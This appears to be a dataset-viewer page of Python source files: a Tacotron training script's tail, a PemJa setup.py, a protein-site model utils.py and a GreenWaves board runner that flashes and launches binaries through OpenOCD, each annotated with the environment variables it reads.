log('Saving checkpoint to: %s-%d' % (checkpoint_path, step))
saver.save(sess, checkpoint_path, global_step=step)
if step % config.test_interval == 0:
log('Saving audio and alignment...')
num_test = config.num_test
fetches = [
model.inputs[:num_test],
model.linear_outputs[:num_test],
model.alignments[:num_test],
test_model.inputs[:num_test],
test_model.linear_outputs[:num_test],
test_model.alignments[:num_test],
]
feed_dict = { **model.get_dummy_feed_dict(), **test_model.get_dummy_feed_dict()}
sequences, spectrograms, alignments, test_sequences, test_spectrograms, test_alignments = sess.run(fetches, feed_dict=feed_dict)
#librosa는 ffmpeg가 있어야 한다.
save_and_plot(sequences[:1], spectrograms[:1], alignments[:1], log_dir, step, loss, "train") # spectrograms: (num_test,200,1025), alignments: (num_test,encoder_length,decoder_length)
save_and_plot(test_sequences, test_spectrograms, test_alignments, log_dir, step, loss, "test")
except Exception as e:
log('Exiting due to exception: %s' % e, slack=True)
traceback.print_exc()
coord.request_stop(e)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--log_dir', default='logdir-tacotron_07')
parser.add_argument('--data_paths', default='./data/kss,./data/pcm')
parser.add_argument('--load_path', default=None) # 아래의 'initialize_path'보다 우선 적용
#parser.add_argument('--load_path', default='logdir-tacotron/moon+son_2018-12-25_19-03-21')
parser.add_argument('--initialize_path', default=None) # ckpt로 부터 model을 restore하지만, global step은 0에서 시작
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--num_test_per_speaker', type=int, default=2)
parser.add_argument('--random_seed', type=int, default=123)
parser.add_argument('--summary_interval', type=int, default=100000)
parser.add_argument('--test_interval', type=int, default=500) # 500
parser.add_argument('--checkpoint_interval', type=int, default=2000) # 2000
parser.add_argument('--skip_path_filter', type=str2bool, default=False, help='Use only for debugging')
parser.add_argument('--slack_url', help='Slack webhook URL to get periodic reports.')
parser.add_argument('--git', action='store_true', help='If set, verify that the client is clean.') # The store_true option automatically creates a default value of False.
config = parser.parse_args()
config.data_paths = config.data_paths.split(",")
setattr(hparams, "num_speakers", len(config.data_paths))
prepare_dirs(config, hparams)
log_path = os.path.join(config.model_dir, 'train.log')
infolog.init(log_path, config.model_dir, config.slack_url)
tf.set_random_seed(config.random_seed)
print(config.data_paths)
if any("krbook" not in data_path for data_path in config.data_paths) and hparams.sample_rate != 20000:
warning("Detect non-krbook dataset. May need to set sampling rate from {} to 20000".format(hparams.sample_rate))
if any('LJ' in data_path for data_path in config.data_paths) and hparams.sample_rate != 22050:
warning("Detect LJ Speech dataset. Set sampling rate from {} to 22050".format(hparams.sample_rate))
if config.load_path is not None and config.initialize_path is not None:
raise Exception(" [!] Only one of load_path and initialize_path should be set")
train(config.model_dir, config)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
setup.py
|
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import io
import os
import sys
import sysconfig
import warnings
from distutils.command.build_ext import build_ext as old_build_ext
from setuptools import setup, Extension
if sys.version_info < (3, 7):
print('Python versions prior to 3.7 are not supported for PemJa.',
file=sys.stderr)
sys.exit(-1)
if sys.version_info >= (3, 10):
fmt = "Pemja may not yet support Python {}.{}."
warnings.warn(
fmt.format(*sys.version_info[:2]),
RuntimeWarning)
del fmt
this_directory = os.path.abspath(os.path.dirname(__file__))
version_file = os.path.join(this_directory, 'src/main/python/pemja/version.py')
try:
exec (open(version_file).read())
except IOError:
print("Failed to load PemJa version file for packaging. {0} not found!".format(version_file),
file=sys.stderr)
sys.exit(-1)
VERSION = __version__ # noqa
with io.open(os.path.join(this_directory, 'README.md'), 'r', encoding='utf-8') as f:
long_description = f.read()
_java_home = None
def get_java_home():
global _java_home
if _java_home is not None:
return _java_home
env_home = os.environ.get('JAVA_HOME')
if env_home:
if os.path.exists(env_home):
_java_home = env_home
return env_home
else:
print('Path {0} indicated by JAVA_HOME does not exist.'.format(env_home),
file=sys.stderr)
sys.exit(-1)
def is_osx():
return 'macosx' in sysconfig.get_platform()
def is_bsd():
return 'bsd' in sysconfig.get_platform()
def get_python_libs():
libs = []
if not is_bsd():
libs.append('dl')
return libs
def get_files(dir, pattern):
ret = []
for root, dirs, files in os.walk(dir):
for f in files:
if f.endswith(pattern):
ret.append(os.path.join(root, f))
return ret
def is_apple_jdk():
return get_java_home() == '/System/Library/Frameworks/JavaVM.framework'
def get_java_linker_args():
if is_apple_jdk():
return ['-framework JavaVM']
return []
def get_java_include():
inc_name = 'include'
if is_apple_jdk():
inc_name = 'Headers'
inc = os.path.join(get_java_home(), inc_name)
if not os.path.exists(inc):
print("Include folder should be at '{0}' but doesn't exist. "
"Please check you've installed the JDK properly.".format(inc),
file=sys.stderr)
sys.exit(-1)
jni = os.path.join(inc, "jni.h")
if not os.path.exists(jni):
print("jni.h should be in '{0}' but doesn't exist. "
"Please check you've installed the JDK properly.".format(jni),
file=sys.stderr)
sys.exit(-1)
paths = [inc]
# Include platform specific headers if found
include_linux = os.path.join(inc, 'linux')
if os.path.exists(include_linux):
paths.append(include_linux)
include_darwin = os.path.join(inc, 'darwin')
if os.path.exists(include_darwin):
paths.append(include_darwin)
include_bsd = os.path.join(inc, 'freebsd')
if os.path.exists(include_bsd):
paths.append(include_bsd)
return paths
def get_numpy_include():
numpy_include = []
try:
import numpy
include_path = os.path.join(numpy.__path__[0], 'core', 'include')
if os.path.exists(include_path):
print('numpy include found at', include_path)
numpy_include = [include_path]
except ImportError:
print('numpy not found', file=sys.stderr)
sys.exit(-1)
return numpy_include
def get_src_include():
return ['src/main/c/Include']
def _is_using_gcc(obj):
is_gcc = False
if obj.compiler.compiler_type == 'unix':
cc = sysconfig.get_config_var("CC")
if not cc:
cc = ""
is_gcc = "gcc" in cc
return is_gcc
class build_ext(old_build_ext):
def build_extension(self, ext):
if _is_using_gcc(self):
if '-std=c99' not in ext.extra_compile_args:
ext.extra_compile_args.append('-std=c99')
old_build_ext.build_extension(self, ext)
extensions = ([
Extension(
name="pemja_core",
sources=get_files('src/main/c/pemja/core', '.c'),
libraries=get_python_libs(),
extra_link_args=get_java_linker_args(),
include_dirs=get_java_include() + ['src/main/c/pemja/core/include'] + get_numpy_include(),
language=3),
Extension(
name="pemja_utils",
sources=get_files('src/main/c/pemja/utils', '.c'),
extra_link_args=get_java_linker_args(),
include_dirs=get_java_include() + ['src/main/c/pemja/utils/include'],
language=3)
])
PACKAGE_DATA = {
'pemja': ['README.txt']
}
PACKAGE_DIR = {
'': 'src/main/python'
}
setup(
name='pemja',
version=VERSION,
packages=["pemja"],
include_package_data=True,
package_dir=PACKAGE_DIR,
package_data=PACKAGE_DATA,
author='Apache Software Foundation',
license='https://www.apache.org/licenses/LICENSE-2.0',
author_email='[email protected]',
python_requires='>=3.7',
install_requires=['numpy==1.19.5'],
cmdclass={'build_ext': build_ext},
description='PemJa',
long_description=long_description,
long_description_content_type='text/markdown',
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: Unix',
'Operating System :: MacOS', ],
ext_modules=extensions)
|
[] |
[] |
[
"JAVA_HOME"
] |
[]
|
["JAVA_HOME"]
|
python
| 1 | 0 | |
Repeat/MTDSite/utils.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : utils.py
@Time : 2022/01/24 11:12:56
@Author : Jianwen Chen
@Version : 1.0
@Contact : [email protected]
@License : (C)Copyright 2021-2022, SAIL-Lab
'''
######################################## import area ########################################
# common library
import os
import random
import pickle
import torch
import torch.nn as nn
import numpy as np
from tqdm import tqdm
from sklearn import metrics
from torch.optim.lr_scheduler import _LRScheduler
######################################## function area ########################################
def seed_everything(seed=2021):
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def initialize_weights(model):
"""
Initializes the weights of a model in place.
:param model: An nn.Module.
"""
for param in model.parameters():
if param.dim() > 1:
nn.init.xavier_uniform_(param)
def loop(data_loader, model, optimizer, scheduler, device):
batch_size = data_loader.batch_size
data_loader = tqdm(data_loader) if optimizer is not None else data_loader
loss_sum, y_true, y_pred = 0.0, list(), list()
predictions = dict()
for batch in data_loader:
names, sequences, graphs, labels, masks = batch
graphs = graphs.to(device)
labels = labels.to(device)
outputs = model(graphs, masks, device)
# loss calculation
# pad_sequence need cpu in model forward and need gpu in loss calculation
masks = masks.to(device)
loss = cal_loss(labels, outputs, masks)
loss_sum += loss.data
if optimizer is not None:
# clear gradients for this training step
optimizer.zero_grad()
# back propagation, compute gradients
loss.backward()
# apply gradients
optimizer.step()
# NormLR needs step every batch
if scheduler is not None:
scheduler.step()
# collect result
labels = labels.detach().cpu().numpy()
scores = torch.softmax(outputs, dim=1)
scores = scores.detach().cpu().numpy()
scores = scores[:, 1]
for name, (idx, length) in zip(names, masks):
y_true.append(labels[idx:idx+length].tolist())
y_pred.append(scores[idx:idx+length].tolist())
predictions[name] = scores[idx:idx+length].tolist()
# clear cuda cache
torch.cuda.empty_cache()
# train with threshold = 0.5, test without using threshold
if optimizer is not None:
results = cal_metric(y_true, y_pred, best_threshold=0.5)
results['loss'] = loss_sum / (len(data_loader) * batch_size)
else:
results = cal_metric(y_true, y_pred, best_threshold=None)
return results, predictions
def cal_loss(y_true, y_pred, y_mask):
# y_true.shape = [batch_num_nodes], y_pred.shape = [batch_num_nodes, 2], total_loss.shape = [batch_num_nodes]
total_loss = nn.CrossEntropyLoss(reduction='none')(y_pred, y_true)
loss = 0.0
for idx, length in y_mask:
loss = loss + torch.mean(total_loss[idx:idx+length])
return loss
def cal_metric(y_true, y_pred, best_threshold=None):
concatenate_true, concatenate_pred = np.concatenate(y_true, axis=-1), np.concatenate(y_pred, axis=-1)
if best_threshold is None:
best_f1, best_threshold = 0, 0
for threshold in range(100):
threshold /= 100
binary_true = concatenate_true
binary_pred = [1 if pred >= threshold else 0 for pred in concatenate_pred]
f1 = metrics.f1_score(binary_true, binary_pred)
if f1 > best_f1:
best_f1, best_threshold = f1, threshold
binary_true = concatenate_true
binary_pred = [1 if pred >= best_threshold else 0 for pred in concatenate_pred]
accuracy = metrics.accuracy_score(binary_true, binary_pred)
auroc = metrics.roc_auc_score(binary_true, concatenate_pred)
mcc = metrics.matthews_corrcoef(binary_true, binary_pred)
TN, FP, FN, TP = metrics.confusion_matrix(binary_true, binary_pred).ravel()
sensitive = TP / (TP + FN)
specificity = TN / (FP + TN)
precision = TP / (TP + FP)
return {'accuracy': accuracy, 'auroc': auroc, 'mcc': mcc, 'sensitive': sensitive, 'specificity': specificity, 'precision': precision,'threshold': best_threshold}
class NoamLR(_LRScheduler):
"""
Noam learning rate scheduler with piecewise linear increase and exponential decay.
The learning rate increases linearly from init_lr to max_lr over the course of
the first warmup_steps (where warmup_steps = warmup_epochs * steps_per_epoch).
Then the learning rate decreases exponentially from max_lr to final_lr over the
course of the remaining total_steps - warmup_steps (where total_steps =
total_epochs * steps_per_epoch). This is roughly based on the learning rate
schedule from Attention is All You Need, section 5.3 (https://arxiv.org/abs/1706.03762).
"""
def __init__(self, optimizer, warmup_epochs, total_epochs, steps_per_epoch, init_lr, max_lr, final_lr):
"""
Initializes the learning rate scheduler.
:param optimizer: A PyTorch optimizer.
:param warmup_epochs: The number of epochs during which to linearly increase the learning rate.
:param total_epochs: The total number of epochs.
:param steps_per_epoch: The number of steps (batches) per epoch.
:param init_lr: The initial learning rate.
:param max_lr: The maximum learning rate (achieved after warmup_epochs).
:param final_lr: The final learning rate (achieved after total_epochs).
"""
assert len(optimizer.param_groups) == len(warmup_epochs) == len(total_epochs) == len(init_lr) == len(max_lr) == len(final_lr)
self.num_lrs = len(optimizer.param_groups)
self.optimizer = optimizer
self.warmup_epochs = np.array(warmup_epochs)
self.total_epochs = np.array(total_epochs)
self.steps_per_epoch = steps_per_epoch
self.init_lr = np.array(init_lr)
self.max_lr = np.array(max_lr)
self.final_lr = np.array(final_lr)
self.current_step = 0
self.lr = init_lr
self.warmup_steps = (self.warmup_epochs * self.steps_per_epoch).astype(int)
self.total_steps = self.total_epochs * self.steps_per_epoch
self.linear_increment = (self.max_lr - self.init_lr) / self.warmup_steps
self.exponential_gamma = (self.final_lr / self.max_lr) ** (1 / (self.total_steps - self.warmup_steps))
super(NoamLR, self).__init__(optimizer)
def get_lr(self):
"""Gets a list of the current learning rates."""
return list(self.lr)
def step(self, current_step: int = None):
"""
Updates the learning rate by taking a step.
:param current_step: Optionally specify what step to set the learning rate to.
If None, current_step = self.current_step + 1.
"""
if current_step is not None:
self.current_step = current_step
else:
self.current_step += 1
for i in range(self.num_lrs):
if self.current_step <= self.warmup_steps[i]:
self.lr[i] = self.init_lr[i] + self.current_step * self.linear_increment[i]
elif self.current_step <= self.total_steps[i]:
self.lr[i] = self.max_lr[i] * (self.exponential_gamma[i] ** (self.current_step - self.warmup_steps[i]))
else: # theoretically this case should never be reached since training should stop at total_steps
self.lr[i] = self.final_lr[i]
self.optimizer.param_groups[i]['lr'] = self.lr[i]
|
[] |
[] |
[
"PYTHONHASHSEED"
] |
[]
|
["PYTHONHASHSEED"]
|
python
| 1 | 0 | |
utils/gapy/runner/board/board_runner.py
|
#
# Copyright (C) 2019 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import runner.default_runner
import os
import errors
import argparse
import json_tools as js
from elftools.elf.elffile import ELFFile
def appendArgs(parser: argparse.ArgumentParser, runnerConfig: js.config) -> None:
"""
Append specific module arguments.
"""
class Runner(runner.default_runner.Runner):
def __init__(self, args, config, system):
super(Runner, self).__init__(args, config, system)
def flash(self):
for flash in self.get_flashs():
if flash.get_bool('content/flash'):
image = flash.get_str('content/image')
if os.environ.get('GAP_USE_PLPBRIDGE') is not None:
cmd = 'plpbridge --chip=%s --verbose 10 --cable=%s --flash-image=%s flash wait' % (os.environ.get('TARGET_NAME'), os.environ.get("PLPBRIDGE_CABLE"), image)
else:
if os.environ.get('GAPY_OPENOCD_CABLE') is not None:
self.config.set('openocd/cable', os.environ.get('GAPY_OPENOCD_CABLE'))
openocd = self.config.get_str("openocd/path")
cable = self.config.get_str('openocd/cable')
script = self.config.get_str('openocd/script')
image_size = os.path.getsize(image)
gap_tools = os.environ.get('GAP_OPENOCD_TOOLS')
wsl = self.config.get_str('runner/wsl')
if wsl is None:
wsl_image = image
else:
path_header = '\\"//wsl$/' + wsl
path_footer = '\\"'
wsl_image = path_header + image + path_footer
script = os.environ.get('OPENOCD_CHIP_TARGET')
if self.config.get_str('**/chip_family') == 'gap':
if flash.get_str('datasheet/type') == 'spi':
flasher_script = 'gap_flash_raw_spi'
else:
flasher_script = 'gap_flash_raw_hyper'
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -c "script %s; script %s; script tcl/flash_image.tcl; script tcl/jtag_boot.tcl; %s %s %d %s; exit;"' % (openocd, cable, script, flasher_script, image, image_size, gap_tools)
elif self.config.get_str('**/chip/name') == 'vega':
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -f "%s" -f "%s" -f "%s/tcl/flash_image.tcl" -c "vega_flash_raw_hyper %s %d %s; exit;"' % (openocd, cable, script, gap_tools, wsl_image, image_size, gap_tools)
else:
if flash.get_str('datasheet/type') == 'mram':
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_evk-mram.elf'
sector_size = 0x2000
else:
if os.environ.get('BOARD_NAME') == 'gap9_evk':
if self.config.get_str('runner/platform') == 'fpga':
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_evk-fpga.elf'
else:
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_evk.elf'
sector_size = 0x1000
else:
if self.config.get_str('runner/platform') == 'fpga':
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gapuino9.elf'
sector_size = 0x40000
else:
# This is for the variant of socketed gap9mod with atxp032
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_v2.elf'
sector_size = 0x1000
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -f "%s" -f "%s" -f "%s/tcl/flash_image.tcl" -c "gap9_flash_raw %s %d %s 0x%x; exit;"' % (openocd, cable, script, gap_tools, wsl_image, image_size, flasher_binary, sector_size)
print ('Flashing image with command:')
print (cmd)
if os.system(cmd):
return -1
return 0
def exec(self):
if os.environ.get('GAPY_OPENOCD_CABLE') is not None:
self.config.set('openocd/cable', os.environ.get('GAPY_OPENOCD_CABLE'))
openocd = self.config.get_str("openocd/path")
cable = self.config.get_str('openocd/cable')
script = self.config.get_str('openocd/script')
binary = self.config.get_str('runner/boot-loader')
wsl = self.config.get_str('runner/wsl')
if wsl is None:
wsl_bin = binary
else:
path_header = '\\"//wsl$/' + wsl
path_footer = '\\"'
wsl_bin = path_header + binary + path_footer
script = os.environ.get('OPENOCD_CHIP_TARGET')
with open(binary, 'rb') as file:
elffile = ELFFile(file)
entry = elffile.header['e_entry']
if self.config.get_bool("openocd/remote/enabled"):
url = self.config.get_str('openocd/remote/url')
path = self.config.get_str('openocd/remote/path')
cmd = 'ssh %s "mkdir -p %s"' % (url, path)
print ('Creating remote path with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
cmd = 'scp %s %s:%s/test' % (binary, url, path)
print ('Copying binary with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
cmd = 'ssh -t %s "%s -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -c \\"script %s; script %s; load_and_start_binary %s/test 0x%x\\""' % (url, openocd, cable, script, path, entry)
print ('Launching execution with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
return 0
else:
chip_family = self.config.get_str('**/chip_family')
if chip_family == 'vega' and os.environ.get('GAPY_USE_OPENOCD') is None:
cmd = 'plpbridge --chip=vega --verbose 10 --cable=ftdi --binary %s reset load ioloop reqloop start wait' % (binary)
elif os.environ.get('GAP_USE_PLPBRIDGE') is not None:
cmd = 'plpbridge --chip=%s --verbose 10 --cable=%s --binary %s reset load ioloop reqloop start wait' % (os.environ.get('TARGET_NAME'), os.environ.get("PLPBRIDGE_CABLE"), binary)
else:
platform = self.config.get_str('runner/platform')
if chip_family == 'vega' or chip_family == 'gap9_v2':
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -f "%s" -f "%s" -c "load_and_start_binary %s 0x%x"' % (openocd, cable, script, wsl_bin, entry)
else:
cmd = "%s -d0 -c 'gdb_port disabled; telnet_port disabled; tcl_port disabled' -f %s -f %s -f tcl/jtag_boot_entry.tcl -c 'gap8_jtag_load_binary_and_start \"%s\" elf 0x%x'" % (openocd, cable, script, wsl_bin, entry)
os.chdir(self.config.get_str('gapy/work_dir'))
print ('Launching execution with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
return 0
|
[] |
[] |
[
"GAP_USE_PLPBRIDGE",
"GAPY_USE_OPENOCD",
"OPENOCD_CHIP_TARGET",
"TARGET_NAME",
"GAP_OPENOCD_TOOLS",
"PLPBRIDGE_CABLE",
"BOARD_NAME",
"GAPY_OPENOCD_CABLE"
] |
[]
|
["GAP_USE_PLPBRIDGE", "GAPY_USE_OPENOCD", "OPENOCD_CHIP_TARGET", "TARGET_NAME", "GAP_OPENOCD_TOOLS", "PLPBRIDGE_CABLE", "BOARD_NAME", "GAPY_OPENOCD_CABLE"]
|
python
| 8 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.